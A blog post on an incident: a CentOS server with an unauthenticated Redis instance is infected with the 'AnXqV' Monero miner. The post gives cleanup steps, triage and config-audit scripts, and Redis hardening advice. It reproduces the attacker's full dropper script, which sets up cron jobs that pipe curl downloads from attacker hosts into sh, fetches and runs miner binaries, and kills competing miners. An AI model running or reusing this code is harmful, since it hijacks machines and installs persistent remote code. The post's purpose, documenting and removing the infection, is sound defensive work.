CentOS 7: a Redis install compromised by the AnXqV mining program
While writing a program I noticed Redis behaving abnormally: the program took forever to start. A look with the top command showed CPU usage close to 100%.
Cause: Redis had been installed and started on CentOS without any access control configured. This is very dangerous.
Sebug published the details of the Redis unauthorized-access flaw: an unauthenticated Redis instance can easily let an attacker take over the whole host.
Vulnerability details: blog.jobbole.com/94518/
Best solution, from a question on security.stackexchange.com (US): http://security.stackexchange.com/questions/129448/how-can-i-kill-minerd-malware-on-an-aws-ec2-instance
I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script:

- On monkeyoto's suggestion, I blocked all communication with the mining pool server:
  iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
  and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
- Removed the cron
  */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh
  from /var/spool/cron/root and /var/spool/cron/crontabs/root.
- Removed the directory /opt/yam.
- Removed /root/.ssh/KHK75NEOiq.
- Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
- Stopped the minerd process: pkill minerd
- Stopped lady: service lady stop

I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 | sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.
I still need to figure out how it gained access into the system but I was able to disable it this way.
First, stay calm and shut down your Redis.
Run ps -ef | grep AnXqV to find the process and kill it. You will soon find this achieves nothing: before long the malware has started itself again.
At that point I ran crontab -l to list the scheduled tasks:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh
The cron job is what keeps restarting it. Delete all scheduled tasks with crontab -r,
then remove the intruder's entry from the file /var/spool/cron/crontabs/root.
Complete command sequence (# the intrusion code may change at any time):
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
crontab -r   # if you have other scheduled tasks of your own, do not use this command; edit the crontab and delete only the intruder's line instead
vi /var/spool/cron/crontabs/root   # delete the intruder's line
:wq
service lady stop
At this point you can easily see the malware's shell script (reproduced below with line breaks restored and annotated by stage):
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# persistence: re-fetch and run the dropper every 5 minutes via root's crontab (both spool locations)
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh" > /var/spool/cron/crontabs/root
# downloader: architecture-specific payload dropped in /tmp
if [ ! -f "/tmp/ddg.219" ]; then
    curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.219
fi
chmod +x /tmp/ddg.219 && /tmp/ddg.219
# kill competing miners and earlier variants so this one has the CPU to itself
CleanTail() {
    ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}
# miner variant 1 (yam), dropped as /tmp/AnXqV.yam
DoYam() {
    if [ ! -f "/tmp/AnXqV.yam" ]; then
        curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
    fi
    chmod +x /tmp/AnXqV.yam
    /tmp/AnXqV.yam -c x -M stratum+tcp://47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB.01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54:x@xmr.crypto-pool.fr:443/xmr
}
# miner variant 2 (minerd), dropped as /tmp/AnXqV
DoMiner() {
    if [ ! -f "/tmp/AnXqV" ]; then
        curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
    fi
    chmod +x /tmp/AnXqV
    /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB.01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54 -p x
}
# kill miners paying other wallets, then (re)start this one if it is not running
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB+01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "AnXqV" || DoMiner
ps auxf|grep -v grep|grep "AnXqV" || DoYam
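The cleanup steps above and the dropper script both point at the same three things a responder should check before and after cleaning: cron entries that pipe a download into a shell, the dropped files in /tmp and /opt, and the process hogging the CPU. The following triage script is an added example written for this page, not the author's own commands; the function names are its own, and the file paths it checks are the ones named in the post, so adjust them for other variants.

```shell
#!/bin/sh
# Added triage helper (not from the original post). It only reports; it
# removes nothing, so it is safe to run before deciding on the cleanup.

# Print crontab lines that fetch something with curl/wget and pipe it into
# a shell, the persistence mechanism seen in the post. $1: crontab file.
# Returns 0 (grep's exit status) when at least one such line exists.
find_pipe_to_shell_cron() {
    grep -nE '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh' "$1" 2>/dev/null
}

# Report which of the given artifact paths exist on disk.
# Returns 0 if at least one is present, 1 if none.
check_miner_artifacts() {
    found=1
    for p in "$@"; do
        if [ -e "$p" ]; then
            echo "present: $p"
            found=0
        fi
    done
    return $found
}

# Show the top CPU consumers, the symptom the post started from.
top_cpu() {
    ps -eo pcpu,pid,args --sort=-pcpu | head -n "${1:-5}"
}

# Stand-alone use: sh triage.sh --run  (paths below are the post's IoCs)
if [ "${1:-}" = "--run" ]; then
    for f in /var/spool/cron/root /var/spool/cron/crontabs/root /etc/crontab; do
        [ -f "$f" ] && { echo "== $f"; find_pipe_to_shell_cron "$f"; }
    done
    check_miner_artifacts /tmp/AnXqV /tmp/AnXqV.yam /tmp/ddg.219 /opt/minerd /opt/yam
    top_cpu 5
fi
```

Run it again after cleaning: the cron grep should print nothing and check_miner_artifacts should return 1. If either still fires a few minutes later, some other persistence (a service like the "lady" one in the Stack Exchange answer, or a second crontab) is still re-dropping the miner.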
The malware did not actually bring my system down; watching memory use, the picture was fairly reassuring.
Next, the Redis back door itself has to be closed. The cleanup above treats the symptom, not the cause, unless you stop using Redis altogether.
Redis configuration
1. Set an auth password and change the port number. Go to the Redis install directory:
cd /home/redis-2.8.17/src/
vi redis.conf
### set in redis.conf:
port 110
requirepass mypassword
###
:wq
./redis-server ./redis.conf &
When you use the ./redis-cli console, authenticate first; if you changed the port, pass it with the -p parameter:
auth mypassword
Redis config reference: http://www.runoob.com/redis/redis-conf.html
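The post fixes the exposure with requirepass and a non-default port. As an added example (not the author's steps and not part of Redis itself), the audit below checks a redis.conf for those two settings and goes a little further with two directives that already exist in Redis 2.8: bind, so the server only listens on localhost, and rename-command CONFIG "", which disables the CONFIG command the unauthorized-access technique relies on to write files to disk. Function names, the 16-character password threshold and the sample config files are this example's own.

```shell
#!/bin/sh
# Added example: audit a redis.conf for the hardening settings discussed above.

# Last effective value of a directive, ignoring commented-out lines.
# $1: conf file, $2: directive name. Prints nothing if the directive is unset.
conf_value() {
    sed -n -E "s/^[[:space:]]*$2[[:space:]]+(.*)$/\1/p" "$1" | tail -n 1
}

# Print one line per weak setting. Returns the number of WEAK findings,
# so 0 means the file passes.
audit_redis_conf() {
    conf="$1"; findings=0

    pass=$(conf_value "$conf" requirepass)
    if [ -z "$pass" ]; then
        echo "WEAK: no requirepass -> add: requirepass <long random password>"
        findings=$((findings + 1))
    elif [ "${#pass}" -lt 16 ]; then
        echo "WEAK: requirepass shorter than 16 characters (AUTH can be brute-forced quickly)"
        findings=$((findings + 1))
    fi

    bind=$(conf_value "$conf" bind)
    if [ -z "$bind" ] || [ "$bind" = "0.0.0.0" ]; then
        echo "WEAK: listening on all interfaces -> add: bind 127.0.0.1"
        findings=$((findings + 1))
    fi

    port=$(conf_value "$conf" port)
    if [ -z "$port" ] || [ "$port" = "6379" ]; then
        echo "INFO: default port 6379; a different port hides nothing from a scanner, bind and requirepass are what close the exposure"
    fi

    # CONFIG SET dir/dbfilename is what lets an unauthenticated client drop a file such as an SSH key
    if ! grep -qE '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]' "$conf"; then
        echo "WEAK: CONFIG command reachable -> add: rename-command CONFIG \"\""
        findings=$((findings + 1))
    fi

    return "$findings"
}

# Stand-alone use: sh audit.sh /home/redis-2.8.17/src/redis.conf
if [ -n "${1:-}" ] && [ -f "$1" ]; then
    audit_redis_conf "$1"
    echo "findings: $?"
fi
```

Note that protected-mode, which makes a Redis with no bind and no password refuse non-loopback clients, only arrived in Redis 3.2; on the 2.8.17 build used in the post the bind line is the only thing standing between the server and the network, which is why the audit treats a missing bind as a finding rather than a note.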
[Redis startup banner (ASCII art omitted): Redis 2.8.17 (00000000/0) 64 bit, Running in stand alone mode, Port: 110, PID: 1754, http://redis.io]
If this article helped you, please follow me on GitHub; it takes a moment and is much appreciated.
https://github.com/okfirelee